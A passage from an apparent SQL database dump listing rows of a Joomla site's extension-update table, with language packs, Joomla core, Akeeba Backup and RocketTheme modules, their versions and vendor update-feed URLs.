CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18862,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18863,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18864,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18865,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18866,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18867,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18868,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18869,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18870,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18871,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18872,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18873,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(18874,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(18875,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(18876,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18877,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18878,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18879,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18880,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18881,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18882,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18883,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18884,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18885,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18886,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18887,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18888,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18889,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18890,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18891,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18892,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18893,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18894,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18895,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18896,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18897,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18898,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18899,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18900,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(18901,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18902,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18903,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18904,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18905,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18906,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18907,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18908,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18909,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18910,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18911,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18912,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18913,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18914,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18915,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18916,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18917,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18918,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18919,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18920,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18921,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18922,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18923,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18924,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18925,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18926,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18927,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18928,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18929,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18930,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18931,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18932,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18933,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18934,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18935,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18936,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18937,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18938,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18939,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18940,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(18941,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(18942,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(18943,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(18944,3,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(18945,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(18946,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(18947,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(18948,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(18949,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(18950,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(18951,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(18952,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(18953,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(18954,20,0,'RokSprocket Module','','mod_roksprocket','module','',0,'2.1.28','0802','http://updates.rockettheme.com/joomla/138/b61e70db','',''),(18955,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(18956,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.46','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(18957,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(18958,20,0,'RokCandy Extension','','rokcandy','plugin','system',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/302/2df8a4e2','',''),(18959,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(18960,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(18961,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(18962,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.9','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(18963,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(18964,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(18965,57,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(18966,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(18967,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(18968,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(18969,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(18970,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(18971,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(18972,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(18973,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(18974,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(18975,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(18976,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(18977,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(18978,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(18979,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(18980,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(18981,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(18982,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(18983,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(18984,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(18985,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(18986,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(18987,57,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(18988,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(18989,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(18990,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(18991,57,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(18992,57,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(18993,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(18994,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(18995,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(18996,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(18997,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(18998,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(18999,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(19000,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(19001,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(19002,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(19003,57,0,'Dari Persian','','pkg_prs-AF','package','',0,'3.4.4.3','','https://update.joomla.org/language/details3/prs-AF_details.xml','',''),(19004,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(19005,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(19006,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(19007,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(19008,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(19009,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(19010,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(19011,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(19012,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19013,76,0,'Akeeba Frontend Framework (FEF)','','file_fef','file','',1,'1.0.13','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/download/fef/1-0-13.html',''),(19014,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.3.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(19015,101,0,'FOF 3.x Stable','','lib_fof30','library','',1,'3.6.2','','http://cdn.akeebabackup.com/updates/fof3_file.xml','https://www.akeebabackup.com/download/fof3/3-6-2.html',''),(19016,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19017,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19018,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19019,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19020,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19021,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19022,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19023,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19024,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19025,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19026,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19027,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19028,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19029,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19030,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19031,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19032,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19033,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19034,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19035,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19036,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19037,67,0,'Akeeba Backup Core package','','pkg_akeeba','package','',0,'7.2.2','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','https://www.akeebabackup.com/download/akeeba-backup/7-2-2.html',''),(19038,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19039,1,0,'Joomla','','joomla','file','',0,'3.9.20','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(19040,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(19041,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(19042,3,0,'French','','pkg_fr-FR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(19043,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(19044,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(19045,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(19046,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(19047,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(19048,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(19049,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(19050,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(19051,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(19052,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(19053,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(19054,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(19055,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.21.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(19056,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(19057,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.16.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(19058,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(19059,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(19060,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.15.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(19061,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(19062,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(19063,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(19064,3,0,'English US','','pkg_en-US','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(19065,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(19066,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(19067,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(19068,3,0,'Ukrainian','','pkg_uk-UA','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/uk-UA_details.xml','',''),(19069,3,0,'Uyghur','','pkg_ug-CN','package','',0,'3.7.5.2','','https://update.joomla.org/language/details3/ug-CN_details.xml','',''),(19070,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(19071,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(19072,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.20.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(19073,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.18.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(19074,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.19.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(19075,3,0,'Serbian 